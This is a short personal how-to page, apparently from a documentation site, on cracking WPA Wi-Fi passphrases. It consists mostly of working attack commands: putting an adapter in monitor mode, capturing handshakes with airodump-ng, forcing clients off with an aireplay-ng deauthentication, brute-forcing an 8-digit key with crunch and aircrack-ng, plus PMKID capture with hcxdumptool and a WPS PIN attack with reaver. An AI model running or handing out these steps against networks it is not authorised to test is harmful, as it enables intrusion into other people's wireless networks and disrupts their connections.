mkdocs-benoit.jp.net/docs/Howtos/HowtoCrackWPA.md
Benoit S 1682796065 🚚 Move all pages to docs/
🔥 Also delete old pages
2021-02-20 12:32:58 +09:00

1.1 KiB

Monitor mode

For my RTL8188EUS:

ip link set wlanX down
iw dev wlanX set type monitor

Scan networks

All channels:

airodump-ng wlanX

Specific channel:

airodump-ng -c 6 wlanX

Save a capture of chosen BSSID

airodump-ng -c 6 --bssid 00:23:B1:82:08:xx -w <filename> wlanX

You need to wait for a client to connect, or to deauth it and get the 4-way handshake.

aireplay-ng -0 1 -a 00:23:B1:82:0C:xx -c D0:37:45:2F:52:xx wlanX

-a is access point
-c is client

Then you should have an EAPOL/WPA handshake.

Crack WPA passphrase

For a 8 digits scheme

crunch 8 8 0123456789 -s 00000000 | aircrack-ng -w - -b 00:23:B1:82:08:xx <filename>.cap

Wireshark

PSK Generator: https://www.wireshark.org/tools/wpa-psk.html

PMKID method

hcxdumptool -i wlanX -o PMKID --enable_status=1

TODO...

WPS method

AP must have WPS enabled with a PIN. Not PBC, push button.

reaver -i wlanX -b 00:23:B1:82:84:xx

Resources

https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools
https://wpa-sec.stanev.org/